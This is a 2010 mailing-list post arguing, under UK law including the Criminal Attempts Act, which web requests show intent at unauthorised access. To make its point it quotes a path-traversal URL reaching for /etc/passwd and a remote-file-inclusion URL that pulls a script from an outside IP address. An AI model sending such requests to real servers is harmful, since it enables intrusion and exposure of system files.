Being safe on the internet (was Re: Here we go again - ISP DPI, but is it interception?)

Jon Ribbens jon+ukcrypto at unequivocal.co.uk
Wed Aug 4 14:29:14 BST 2010


On Wed, Aug 04, 2010 at 01:32:14PM +0100, Francis Davey wrote:
> > If the server operator did not intend to provide access above server root,
> > then they should have configured their server to provide an appropriate
> > (4xx) denial.
> 
> Do we know they did not? You commit an offence of attempt if you try
> to do this even if the server operator has indeed secured themselves
> against unauthorised access. What the web server does or does not do
> is not nearly as important as one might think because of the Criminal
> Attempts Act.

Personally, I think that (attempting to) access http://example.com/
or http://example.com/../ shows little-to-no evidence of knowingly
attempting to access unauthorised data. If, however, as is seen
commonly, someone attempts to access something like
http://example.com/../../../etc/passwd or
http://example.com/index.php?include=http://1.2.3.4/hax0r.inc
or similar, then the user is quite blatantly attempting unauthorised
access and can most certainly be regarded as a criminal.


